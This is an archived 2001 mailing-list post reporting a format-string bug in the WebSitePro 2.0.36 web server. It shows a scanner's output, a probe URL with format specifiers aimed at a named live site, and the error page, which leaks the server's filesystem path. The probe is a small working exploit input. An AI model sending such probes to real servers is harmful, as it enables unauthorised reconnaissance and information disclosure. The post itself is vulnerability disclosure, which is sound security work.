Vulnerability Development mailing list archives

WebSitePro format bug + (old) its path.

From: Paulo Ribeiro <prrar () nitnet com br>
Date: Sun, 23 Dec 2001 00:53:57 -0200

$ ./psec www.estacio.br -h

P-SEC version 1.0 (alpha) - by Paulo Ribeiro, Dec. 2001.

- Date: Sun Dec 23 00:38:25 2001

- HTTP Server: WebSitePro version 2.0.36
* Alert: HTTP server may be vulnerable.

  -- Checking possible vulnerabilities:
  <cut>
  ---- Format bug (GET): found. (try http://host/%a%s%...)
  <cut>
$

Now, let's try to access the following link:
        http://www.estacio.br/%a%s%p%d

Here's what we get:
1       404 Not Found
2 
3       The requested URL was not found on this server:
4 
5       /*s?d
6 
7       (C:/WebSite/htdocs/*s?d)

So, we have:
line 5: format bug.
line 7: format bug + its path.

I don't know if this bug has already been fixed, as I've tested the
version 2.0.36.

Yours,
Paulo Ribeiro   - prrar () nitnet com br
IME             - www.ime.eb.br
CSB             - www.csbrj.org.br

Current thread:

WebSitePro format bug + (old) its path. Paulo Ribeiro (Dec 23)
- Re: WebSitePro format bug + (old) its path. Nelson Brito (Dec 27)